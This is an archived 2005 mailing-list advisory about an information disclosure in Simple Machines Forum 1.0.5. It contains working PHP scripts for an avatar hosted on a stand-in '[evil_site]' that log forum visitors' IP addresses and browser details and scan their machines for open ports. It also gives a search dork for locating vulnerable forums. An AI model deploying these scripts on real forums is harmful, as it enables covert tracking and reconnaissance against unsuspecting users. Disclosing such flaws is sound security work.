Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Simple Machine Forum 1-0-5 (possibly prior versions) user IP address / i

from [retrogod] Network Security [Permanent Link]
Subject: Simple Machine Forum 1-0-5 (possibly prior versions) user IP address / information disclosure
Date: 31 Aug 2005 10:37:57 -0000 
Simple Machine Forum 1-0-5 (possibly prior versions) user IP address /
information disclosure

software:
site: http://www.simplemachines.org/

information disclosure:  
a user can choose an sumbit an avatar url like this:

http://[evil_site]/image.php

where image.php is a file like this:

<?php
 $log="log".date("Ymd").".txt"; 
 $fp=fopen($log,'a');
 fputs($fp,$REMOTE_ADDR.":".$REMOTE_PORT." - 
".$HTTP_USER_AGENT."-".$HTTP_REFERER."-".$REQUEST_METHOD."-".$QUERY_STRING."-".$HTTP_ACCEPT_LANGUAGE."-".$REQUEST_URI."\r\n");
 fclose($fp)
?>

When forum users view a page that should show the avatar, a new line is appended
to log[date].txt on [evil_site] server, like this:

08.31.05 04.09 - 192.168.1.1:8562 - Mozilla/4.0 (compatible; MSIE 6.0; Windows 
NT 5.1)-http://[target]/[path]/[page]-GET--it-/image.php

so an external user can monitor in details the forum activity, user ip 
addresses, have informations on OS and browsers used and so on

the evil script could check for open ports/services on target machines to send
them exploit code or proxies, trojan ports, do some other stuff, just an 
example:

<?php
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 1);
$log="log".date("Ymd").".txt";
$fp=fopen($log,'a');
fputs($fp,'open ports on '.$REMOTE_ADDR.": ");
$portlist="23;135;139;445;1080;3128;8080;12345";
$ports=explode(";",$portlist);
for ($i=0; $i<=count($ports)-1; $i++)
{
$ock=fsockopen($REMOTE_ADDR,$ports[$i]);
if ($ock) {fputs($fp,$ports[$i].' '); fclose($ock);}
}
fputs($fp,"\r\n");
fclose($fp);
//then a lot of creativity ;)
?>

googledork: "Powered by SMF"

rgod
site: http://rgod.altervista.org
mail: retrogod@aliceposta.it


original advisory: http://rgod.altervista.org/smf105.html
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Simple Machine Forum 1-0-5 (possibly prior versions) user IP address / information disclosure, retrogod <=
Previous by Date:  Obsidis #1 Call for Papers, angelo
Next by Date:  Re: ICMP attacks against TCP: Conclusions, Damien Miller
Previous by Thread:  Obsidis #1 Call for Papers, angelo
Next by Thread:  Flatnuke 2.5.6 (possibly prior versions) Underlying system information disclosure / Administrative & users credentials disclosure, retrogod
Indexes:  [Date] [Thread] [Top] [All Lists]